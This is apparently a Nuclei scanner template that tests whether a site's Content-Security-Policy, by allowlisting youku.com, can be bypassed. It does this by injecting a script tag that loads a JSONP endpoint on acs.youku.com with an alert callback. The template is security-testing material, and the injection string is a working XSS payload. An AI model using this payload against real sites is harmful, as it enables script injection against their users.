id: youku-acs-csp-bypass
info:
name: Content-Security-Policy Bypass - Youku ACS
author: renniepak,DhiyaneshDK
severity: medium
reference:
- https://github.com/renniepak/CSPBypass/blob/main/data.tsv
metadata:
verified: true
tags: xss,csp-bypass,youku-acs,vuln
flow: http(1) && headless(1)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: header
words:
- "Content-Security-Policy"
- "youku.com"
condition: and
internal: true
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitdialog
name: youku_acs_csp_xss
args:
max-duration: 5s
payloads:
injection:
- '<script src="https://acs.youku.com/h5/mtop.youku.playlog.open.get/1.0/?jsv=2.6.1&appKey=24679788&t=1734359327631&sign=6b8f8b6abb27c68582606eed336c887d&api=mtop.youku.playlog.open.get&v=1.0&dataType=jsonp&jsonpIncPrefix=headerRecord1734359327618&type=jsonp&callback=alert&data={%22nlid%22%3A%22XlQcF5xQrCcCAWoLKdGqIOhS%22%2C%22uid%22%3A%22%22%2C%22pageLength%22%3A100%2C%22timestamp%22%3A%221734359327617%22%2C%22appKey%22%3A%22qPbb2hfIYugHjMaj%22%2C%22appName%22%3A%22pc%22%2C%22hwClass%22%3A1%2C%22deviceName%22%3A%22web%22%2C%22isPlayController%22%3A1%2C%22ccode%22%3A%220502%22%2C%22clientDrmAbility%22%3A3}"></script>'
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{url_encode(injection)}}"
matchers:
- type: dsl
dsl:
- "youku_acs_csp_xss == true"
# digest: 4a0a0047304502201e20b18134f9127f66f3241fe8a5d2e50215f744031bd7d05e1b07ec34cc68f7022100f1bb15d6af227573eb6fbcdc32bc8375b6d8b3389476b0625d7e14d363712be2:922c64590222798bb761d5b6d8e72950